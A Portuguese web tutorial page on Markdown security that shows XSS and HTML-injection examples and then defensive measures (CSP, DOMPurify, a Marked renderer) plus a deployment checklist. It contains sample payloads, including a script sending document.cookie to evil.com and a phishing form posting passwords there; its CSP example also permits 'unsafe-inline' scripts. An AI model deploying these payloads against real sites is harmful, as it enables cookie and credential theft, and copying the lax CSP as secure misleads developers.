Tutorial de Markdown

Português

English
简体中文
繁体中文
日本語
한국어
русский
Français
Deutsch
Italiano
Español
ไทย
Tiếng Việt
العربية
हिन्दी

Português

English
简体中文
繁体中文
日本語
한국어
русский
Français
Deutsch
Italiano
Español
ไทย
Tiếng Việt
العربية
हिन्दी

Appearance

Melhores práticas de segurança Markdown

Embora o Markdown pareça texto simples, o manuseio inadequado pode levar a vulnerabilidades de segurança graves. Este guia mostra como lidar com conteúdo Markdown de forma segura.

Ameaças de segurança comuns

1. XSS (Cross-Site Scripting)

O Markdown permite incorporar HTML, o que pode ser explorado para injetar scripts maliciosos:

markdown
<!-- Perigoso: HTML não sanitizado -->
<script>
  // Roubar cookies
  fetch('https://evil.com/steal?data=' + document.cookie);
</script>

<img src="x" onerror="alert('XSS')">

<a href="javascript:alert('XSS')">Clique aqui</a>

2. Injeção HTML

Mesmo sem JavaScript, HTML malicioso pode causar danos:

markdown
<!-- Ataque de phishing -->
<form action="https://evil.com/phish" method="POST">
  <input type="password" name="password" placeholder="Digite a senha">
  <button>Entrar</button>
</form>

Estratégias de defesa

1. Content Security Policy (CSP)

Implementar cabeçalhos CSP rígidos:

html
<meta http-equiv="Content-Security-Policy" 
      content="default-src 'self'; 
               script-src 'self' 'unsafe-inline' https://trusted-cdn.com; 
               style-src 'self' 'unsafe-inline'; 
               img-src 'self' data: https:;">

2. Sanitização HTML

Usar bibliotecas de sanitização dedicadas:

DOMPurify (navegador)

javascript
import DOMPurify from 'dompurify';
import marked from 'marked';

const dirty = marked.parse(userMarkdown);
const clean = DOMPurify.sanitize(dirty, {
  ALLOWED_TAGS: ['p', 'br', 'strong', 'em', 'a', 'ul', 'ol', 'li', 'code', 'pre'],
  ALLOWED_ATTR: ['href', 'title', 'class'],
  FORBID_TAGS: ['script', 'style', 'iframe', 'form'],
  FORBID_ATTR: ['onerror', 'onclick', 'onload']
});

document.getElementById('output').innerHTML = clean;

3. Configurar parser Markdown seguro

Configuração segura Marked

javascript
const marked = require('marked');

const renderer = {
  html(html) {
    // Bloquear HTML completamente
    return '';
  },
  link(href, title, text) {
    // Permitir apenas protocolos seguros
    const safeProtocols = ['http:', 'https:', 'mailto:'];
    try {
      const url = new URL(href);
      if (!safeProtocols.includes(url.protocol)) {
        return text;
      }
    } catch {
      return text;
    }
    
    return `<a href="${href}" title="${title || ''}" rel="noopener noreferrer" target="_blank">${text}</a>`;
  }
};

marked.use({ renderer });

Lista de verificação de segurança

Antes do deployment

  • [ ] Ativar Content Security Policy (CSP)
  • [ ] Implementar sanitização HTML (DOMPurify/sanitize-html)
  • [ ] Desabilitar ou restringir HTML bruto
  • [ ] Validar todas as URLs e links
  • [ ] Implementar limitação de taxa
  • [ ] Adicionar proteção CSRF
  • [ ] Validar uploads de arquivos
  • [ ] Implementar autenticação e autorização
  • [ ] Definir limites de comprimento de conteúdo
  • [ ] Ativar HTTPS
  • [ ] Configurar cabeçalhos HTTP seguros
  • [ ] Implementar logging e monitoramento
  • [ ] Realizar auditorias de segurança regulares
  • [ ] Manter dependências atualizadas

Conclusão

A segurança do Markdown não deve ser negligenciada. Ao implementar medidas adequadas de sanitização, validação, autenticação e monitoramento, você pode lidar com segurança com conteúdo Markdown gerado pelo usuário e proteger aplicativos e usuários de ataques.

Recursos adicionais

Construído por www.markdownlang.com

Licença MIT | Copyright © 2023-presente